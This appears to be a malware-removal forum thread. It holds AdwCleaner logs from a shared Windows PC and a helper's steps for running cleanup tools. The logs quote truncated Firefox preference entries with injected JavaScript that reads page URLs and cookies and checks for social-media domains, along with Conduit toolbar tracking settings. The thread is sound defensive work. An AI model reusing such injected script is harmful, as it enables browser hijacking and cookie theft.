Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\prefs.js ]

Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\prefs.js ]

Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

[ File : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\prefs.js ]


[ File : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\prefs.js ]

Line Found : user_pref("CT3074349..clientLogIsEnabled", true);
Line Found : user_pref("CT3074349..clientLogServiceUrl", "hxxp://clientlog.users.conduit.com/ClientDiagnostics.asmx/ReportDiagnosticsEvent");
Line Found : user_pref("CT3074349..uninstallLogServiceUrl", "hxxp://uninstall.users.conduit.com/Uninstall.asmx/RegisterToolbarUninstallation");
Line Found : user_pref("CT3074349.AboutPrivacyUrl", "hxxp://www.conduit.com/privacy/Default.aspx");
Line Found : user_pref("CT3074349.CTID", "CT3074349");
Line Found : user_pref("CT3074349.CurrentServerDate", "16-9-2011");
Line Found : user_pref("CT3074349.DialogsAlignMode", "LTR");
Line Found : user_pref("CT3074349.DialogsGetterLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.DownloadReferralCookieData", "");
Line Found : user_pref("CT3074349.FirstServerDate", "15-9-2011");
Line Found : user_pref("CT3074349.FirstTime", true);
Line Found : user_pref("CT3074349.FirstTimeFF3", true);
Line Found : user_pref("CT3074349.FixPageNotFoundErrors", true);
Line Found : user_pref("CT3074349.GroupingServerCheckInterval", 1440);
Line Found : user_pref("CT3074349.GroupingServiceUrl", "hxxp://grouping.services.conduit.com/");
Line Found : user_pref("CT3074349.HasUserGlobalKeys", true);
Line Found : user_pref("CT3074349.Initialize", true);
Line Found : user_pref("CT3074349.InitializeCommonPrefs", true);
Line Found : user_pref("CT3074349.InstallationAndCookieDataSentCount", 2);
Line Found : user_pref("CT3074349.InstallationType", "UnknownIntegration");
Line Found : user_pref("CT3074349.InstalledDate", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.InvalidateCache", false);
Line Found : user_pref("CT3074349.IsGrouping", false);
Line Found : user_pref("CT3074349.IsInitSetupIni", true);
Line Found : user_pref("CT3074349.IsMulticommunity", false);
Line Found : user_pref("CT3074349.IsOpenThankYouPage", false);
Line Found : user_pref("CT3074349.IsOpenUninstallPage", true);
Line Found : user_pref("CT3074349.LanguagePackLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.LanguagePackReloadIntervalMM", 1440);
Line Found : user_pref("CT3074349.LanguagePackServiceUrl", "hxxp://translation.users.conduit.com/Translation.ashx");
Line Found : user_pref("CT3074349.LastLogin_3.6.0.10", "Thu Sep 15 2011 20:24:45 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.LatestVersion", "3.6.0.10");
Line Found : user_pref("CT3074349.Locale", "en");
Line Found : user_pref("CT3074349.MCDetectTooltipHeight", "83");
Line Found : user_pref("CT3074349.MCDetectTooltipUrl", "hxxp://@EB_INSTALL_LINK@/rank/tooltip/?version=1");
Line Found : user_pref("CT3074349.MCDetectTooltipWidth", "295");
Line Found : user_pref("CT3074349.MyStuffEnabledAtInstallation", true);
Line Found : user_pref("CT3074349.OriginalFirstVersion", "3.6.0.10");
Line Found : user_pref("CT3074349.RadioIsPodcast", false);
Line Found : user_pref("CT3074349.RadioLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.RadioLastUpdateIPServer", "3");
Line Found : user_pref("CT3074349.RadioLastUpdateServer", "3");
Line Found : user_pref("CT3074349.RadioMediaID", "9962");
Line Found : user_pref("CT3074349.RadioMediaType", "Media Player");
Line Found : user_pref("CT3074349.RadioMenuSelectedID", "EBRadioMenu_CT30743499962");
Line Found : user_pref("CT3074349.RadioShrinkedFromSetup", false);
Line Found : user_pref("CT3074349.RadioStationName", "California%20Rock");
Line Found : user_pref("CT3074349.RadioStationURL", "hxxp://feedlive.net/california.asx");
Line Found : user_pref("CT3074349.SavedHomepage", "about:blank");
Line Found : user_pref("CT3074349.SearchFromAddressBarIsInit", true);
Line Found : user_pref("CT3074349.SearchInNewTabEnabled", true);
Line Found : user_pref("CT3074349.SearchInNewTabIntervalMM", 1440);
Line Found : user_pref("CT3074349.SearchInNewTabLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.SearchInNewTabServiceUrl", "hxxp://newtab.conduit-hosting.com/newtab/?ctid=EB_TOOLBAR_ID");
Line Found : user_pref("CT3074349.SearchInNewTabUsageUrl", "hxxp://Usage.Hosting.conduit-services.com/UsageService.asmx/UsersRequests?ctid=EB_TOOLBAR_ID");
Line Found : user_pref("CT3074349.SearchInNewTabUserEnabled", false);
Line Found : user_pref("CT3074349.SearchProtectorToolbarDisabled", true);
Line Found : user_pref("CT3074349.ServiceMapLastCheckTime", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.SettingsLastCheckTime", "Thu Sep 15 2011 20:24:41 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.SettingsLastUpdate", "1314715212");
Line Found : user_pref("CT3074349.ThirdPartyComponentsInterval", 504);
Line Found : user_pref("CT3074349.ThirdPartyComponentsLastCheck", "Thu Sep 15 2011 06:32:54 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.ThirdPartyComponentsLastUpdate", "1312887586");
Line Found : user_pref("CT3074349.ToolbarDisabled", false);
Line Found : user_pref("CT3074349.ToolbarShrinkedFromSetup", false);
Line Found : user_pref("CT3074349.TrusteLinkUrl", "hxxp://trust.conduit.com/CT3074349");
Line Found : user_pref("CT3074349.TrustedApiDomains", "conduit.com,conduit-hosting.com,conduit-services.com,client.conduit-storage.com,OurToolbar.com,CommunityToolbars.com,ForumToolbar.com,MyBlogToolbar.com,MyCity[...]
Line Found : user_pref("CT3074349.Uninstall", true);
Line Found : user_pref("CT3074349.UserID", "UN72577828490742812");
Line Found : user_pref("CT3074349.WeatherNetwork", "");
Line Found : user_pref("CT3074349.WeatherPollDate", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.WeatherUnit", "F");
Line Found : user_pref("CT3074349.alertChannelId", "1465784");
Line Found : user_pref("CT3074349.generalConfigFromLogin", "{\"ApiMaxAlerts\":\"12\",\"SocialDomains\":\"social.conduit.com;apps.conduit.com;services.apps.conduit.com\",\"AppsDetectionUrlPattern\":\"hxxp://appdown[...]
Line Found : user_pref("CT3074349.globalFirstTimeInfoLastCheckTime", "Thu Sep 15 2011 20:24:42 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.homepageProtectorEnableByLogin", true);
Line Found : user_pref("CT3074349.initDone", true);
Line Found : user_pref("CT3074349.isAppTrackingManagerOn", true);
Line Found : user_pref("CT3074349.isFirstRadioInstallation", false);
Line Found : user_pref("CT3074349.myStuffEnabled", true);
Line Found : user_pref("CT3074349.myStuffPublihserMinWidth", 400);
Line Found : user_pref("CT3074349.myStuffSearchUrl", "hxxp://Apps.conduit.com/search?q=SEARCH_TERM&SearchSourceOrigin=29&ctid=EB_TOOLBAR_ID&octid=EB_ORIGINAL_CTID");
Line Found : user_pref("CT3074349.myStuffServiceIntervalMM", 1440);
Line Found : user_pref("CT3074349.myStuffServiceUrl", "hxxp://mystuff.conduit-services.com/MyStuffService.ashx?ComponentId=EB_MY_STUFF_INSTANCE_GUID&lut=EB_MY_STUFF_LUT");
Line Found : user_pref("CT3074349.oldAppsList", "129446538071425236,129574421762864744,111,129574421763479940,1000082,129574421763997487,1000234,129574421764495504,129574421764505270,129574421764515036,1000034,100[...]
Line Found : user_pref("CT3074349.searchProtectorDialogDelayInSec", 10);
Line Found : user_pref("CT3074349.searchProtectorEnableByLogin", true);
Line Found : user_pref("CT3074349.testingCtid", "");
Line Found : user_pref("CT3074349.toolbarAppMetaDataLastCheckTime", "Thu Sep 15 2011 06:32:56 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.toolbarContextMenuLastCheckTime", "Thu Sep 15 2011 06:32:59 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CT3074349.usagesFlag", 1);
Line Found : user_pref("CommunityToolbar.ConduitHomepagesList", "hxxp://search.conduit.com/?ctid=CT3074349&SearchSource=13");
Line Found : user_pref("CommunityToolbar.ConduitSearchList", "PhotoJoy US Customized Web Search,uTorrentControl2 Customized Web Search");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://Settings.toolbar.search.conduit.com/root/CT3072253/CT3072253", "\"76b4669a117e81f713161171f6d50d821\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1463702/1459356/US", "\"0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://alerts.conduit-services.com/root/1465784/1461438/US", "\"0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3072253", "\"1336063965\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://appsmetadata.toolbar.conduit-services.com/?ctid=CT3074349", "\"1312968577\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=GottenApps&locale=en", "C5ZJe6gL80JBW5CuLy+wkg==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=OtherApps&locale=en", "2E1/v7EfCEDbv3VaBQMELg==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=SharedApps&locale=en", "k9un27OkAvkwB2ZmvXxTnA==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://contextmenu.toolbar.conduit-services.com/?name=Toolbar&locale=en", "4BgM4MhF/sOgPsDNmIs3Yw==");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.alert.conduit-services.com/alert/dlg.pkg", "\"8076e3ce381dcd1:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.13.0.6", "\"4ead38b3e6bcd1:145a\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://dynamicdialogs.toolbar.conduit-services.com/DLG.pkg?ver=3.6.0.10", "\"80ee9485875dcc1:1192\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3072253", "\"d76323372b05c3748a3d6b1c93a98292\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://servicemap.conduit-services.com/Toolbar/?ownerId=CT3074349", "\"634515122457000000\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://settings.toolbar.conduit-services.com/?ctid=CT3074349&octid=CT3074349", "\"1314715212\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/equalizer_dead.gif", "\"03e383867bc91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/minimize.gif", "\"0e685fa27bc91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/play.gif", "\"02faea337c7c91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/stop.gif", "\"03a54d7f47ac91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://storage.conduit.com/BankImages/RadioSkins/Midnight/vol.gif", "\"049b47644c7c91:0\"");
Line Found : user_pref("CommunityToolbar.ETag.hxxp://translation.toolbar.conduit-services.com/?locale=en", "\"1c8884e1d7013beea7adb5fd75562429\"");
Line Found : user_pref("CommunityToolbar.LatestLibsPath", "file:///C:\\Users\\Nick\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\ghs5oui9.default\\conduitCommon\\modules\\3.13.0.6");
Line Found : user_pref("CommunityToolbar.LatestToolbarVersionInstalled", "3.13.0.6");
Line Found : user_pref("CommunityToolbar.SearchFromAddressBarSavedUrl", "hxxp://www.bing.com/search?pc=Z016&form=ZGAADF&q=");
Line Found : user_pref("CommunityToolbar.ToolbarsList", "CT3074349");
Line Found : user_pref("CommunityToolbar.ToolbarsList2", "CT3074349");
Line Found : user_pref("CommunityToolbar.ToolbarsList4", "CT3074349");
Line Found : user_pref("CommunityToolbar.globalUserId", "cc216d56-d7ed-4ac3-8282-651bea8138ff");
Line Found : user_pref("CommunityToolbar.isAlertUrlAddedToFeedItemTable", true);
Line Found : user_pref("CommunityToolbar.isClickActionAddedToFeedItemTable", true);
Line Found : user_pref("CommunityToolbar.keywordURLSelectedCTID", "CT3072253");
Line Found : user_pref("CommunityToolbar.notifications.alertDialogsGetterLastCheckTime", "Fri Jun 08 2012 00:17:45 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CommunityToolbar.notifications.alertEnabled", true);
Line Found : user_pref("CommunityToolbar.notifications.alertInfoInterval", 1440);
Line Found : user_pref("CommunityToolbar.notifications.alertInfoLastCheckTime", "Fri Jun 08 2012 12:36:14 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CommunityToolbar.notifications.clientsServerUrl", "hxxp://alert.client.conduit.com");
Line Found : user_pref("CommunityToolbar.notifications.locale", "en");
Line Found : user_pref("CommunityToolbar.notifications.loginIntervalMin", 1440);
Line Found : user_pref("CommunityToolbar.notifications.loginLastCheckTime", "Fri Jun 08 2012 00:17:44 GMT-0700 (Pacific Daylight Time)");
Line Found : user_pref("CommunityToolbar.notifications.loginLastUpdateTime", "1313487611");
Line Found : user_pref("CommunityToolbar.notifications.messageShowTimeSec", 20);
Line Found : user_pref("CommunityToolbar.notifications.servicesServerUrl", "hxxp://alert.services.conduit.com");
Line Found : user_pref("CommunityToolbar.notifications.showTrayIcon", false);
Line Found : user_pref("CommunityToolbar.notifications.userCloseIntervalMin", 300);
Line Found : user_pref("CommunityToolbar.notifications.userId", "5da594d4-182c-41cf-960d-e9dcf87f3b75");
Line Found : user_pref("CommunityToolbar.originalHomepage", "hxxp://www.google.com/");
Line Found : user_pref("CommunityToolbar.originalSearchEngine", "chrome://browser-region/locale/region.properties");
Line Found : user_pref("browser.search.defaultthis.engineName", "uTorrentControl2 Customized Web Search");
Line Found : user_pref("extensions.HQsEy_PhSd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.U2fS1d7u.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.hpw_wU.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.[...]
Line Found : user_pref("extensions.lg_GIGj.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo[...]
Line Found : user_pref("extensions.wt2D__OrbH0.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumo[...]

-\\ Google Chrome v35.0.1916.153

[ File : C:\Users\Bill\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Extension] : booedmolknjekdopkepjjeckmjkdpfgl
Found [Extension] : flpcjncodpafbgdpnkljologafpionhb

[ File : C:\Users\Dylan\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\Hannah\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}
Found [Search Provider] : hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3319598&octid=EB_ORIGINAL_CTID&ISID=M180E7AAF-7B0C-4944-94F1-C3AD338C4DD6&SearchSource=58&CUI=&UM=5&UP=SP9F1267DC-924A-4FA2-8BD3-B25688915483&q={searchTerms}&SSPV=

[ File : C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\preferences ]

Found [Search Provider] : hxxp://search.aol.com/aol/search?query={searchTerms}
Found [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [30957 octets] - [01/11/2014 10:55:50]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [31018 octets] ##########
 

Attached Files


Edited by topper8281, 01 November 2014 - 01:11 PM.


#6 Jo*

Jo*

  • Malware Response Team
  • 3,319 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:08:33 PM

Posted 01 November 2014 - 01:14 PM

Hello topper8281,

Double click on AdwCleaner.exe to run the tool again.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin to scan your computer like it did before.
  • When the scan has finished, the actual line should say "Pending. Please uncheck elements you do not want to remove". Look through the scan results and uncheck any entries that you do not wish to remove.
  • This time, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S0].txt) will open automatically.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

***


Please download Junkware Removal Tool from HERE and save it to your desktop.
Shutdown your antivirus to avoid any potential conflicts.
Double click JRT.exe to run the tool.
Vista / Windows 7/8 users right-click and select Run As Administrator.
  • JRT will begin to backup your registry and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, the log JRT.txt is saved on your desktop and will automatically open.
Enable your antivirus!
Post the contents of JRT.txt into your next reply.


***


Run the Farbar Recovery Scan Tool again.
  • Double-click to run FSRT / FSRT64. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.

***


How the computer is running now?


***


Graduate of the WTT Classroom
Cheers,
Jo
If I have been helping you, and I have not replied to your latest post in 36 hours please send me a PM.


#7 topper8281

topper8281
  • Topic Starter

  • Members
  • 33 posts
  • OFFLINE
  •  
  • Local time:11:33 AM

Posted 01 November 2014 - 02:19 PM

Hey Jo. Internet Explorer, Opera, and Firefox seem to be running just fine now. But when I open Google Chrome I get suspicious looking advertisements, and fake notification boxes. I've uploaded a few of these pictures to this post so you can see it for yourself. Here are the rest of the logs you requested. The addition file that is attached is from the first time I ran FRST, not the latest.

 

 

# AdwCleaner v3.311 - Report created 01/11/2014 at 11:31:44
# Updated 30/09/2014 by Xplode
# Operating System : Windows Vista ™ Ultimate Service Pack 2 (32 bits)
# Username : Nick - WALKER-PC
# Running from : C:\Users\Nick\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : ca82e1a5

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\FlaashCoupon
Folder Deleted : C:\ProgramData\QueenCoupioon
Folder Deleted : C:\ProgramData\SaalesCheckEr
Folder Deleted : C:\ProgramData\SaLesChheckueR
Folder Deleted : C:\ProgramData\SaveItCoupons
Folder Deleted : C:\ProgramData\Webusavveer
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\optimizer pro v3.2
Folder Deleted : C:\Program Files\Conduit
Folder Deleted : C:\Program Files\Optimizer Pro
Folder Deleted : C:\Program Files\Search Toolbar
Folder Deleted : C:\Users\Bill\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Hannah\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Optimizer Pro
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Search Protection
Folder Deleted : C:\Users\Hannah\Documents\Optimizer Pro
Folder Deleted : C:\Users\Nick\AppData\Local\Conduit
Folder Deleted : C:\Users\Nick\AppData\Local\Temp\rightsurf
Folder Deleted : C:\Users\Nick\AppData\Roaming\registry mechanic
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\ConduitCommon
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\StumbleUpon
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\ioooiaooqff@dejai.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\ioooiaooqff@dejai.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\ioooiaooqff@dejai.org
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org
Folder Deleted : C:\Users\Dylan\AppData\Roaming\Mozilla\Firefox\Profiles\tfy69zts.default\Extensions\yzfw@rvhdxng.org
Folder Deleted : C:\Users\Hannah\AppData\Roaming\Mozilla\Firefox\Profiles\xayzwqat.default\Extensions\yzfw@rvhdxng.org
Folder Deleted : C:\Users\Kristi\AppData\Roaming\Mozilla\Firefox\Profiles\0fm25aqu.default\Extensions\staged\yzfw@rvhdxng.org

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\Toolbar.CT3072253
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}
Key Deleted : HKCU\Software\APN PIP
Key Deleted : HKCU\Software\IM
Key Deleted : HKCU\Software\ImInstaller
Key Deleted : HKCU\Software\Softonic
Key Deleted : HKCU\Software\YahooPartnerToolbar
Key Deleted : HKCU\Software\Zugo
Key Deleted : HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKCU\Software\AppDataLow\Toolbar
Key Deleted : HKCU\Software\AppDataLow\Software\Conduit
Key Deleted : HKCU\Software\AppDataLow\Software\SmartBar
Key Deleted : HKLM\SOFTWARE\{1146AC44-2F03-4431-B4FD-889BC837521F}
Key Deleted : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\SOFTWARE\{6791A2F3-FC80-475C-A002-C014AF797E9C}
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\ImInstaller
Key Deleted : HKLM\SOFTWARE\PIP
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8B114619-78B7-1CFF-55EF-74266954F883}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6F10CA8F-97E3-48FB-9003-3EE8E9050577}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CC17A332-9555-AD95-3985-0BDD9BF0EC71}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Optimizer Pro_is1
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SearchProtect
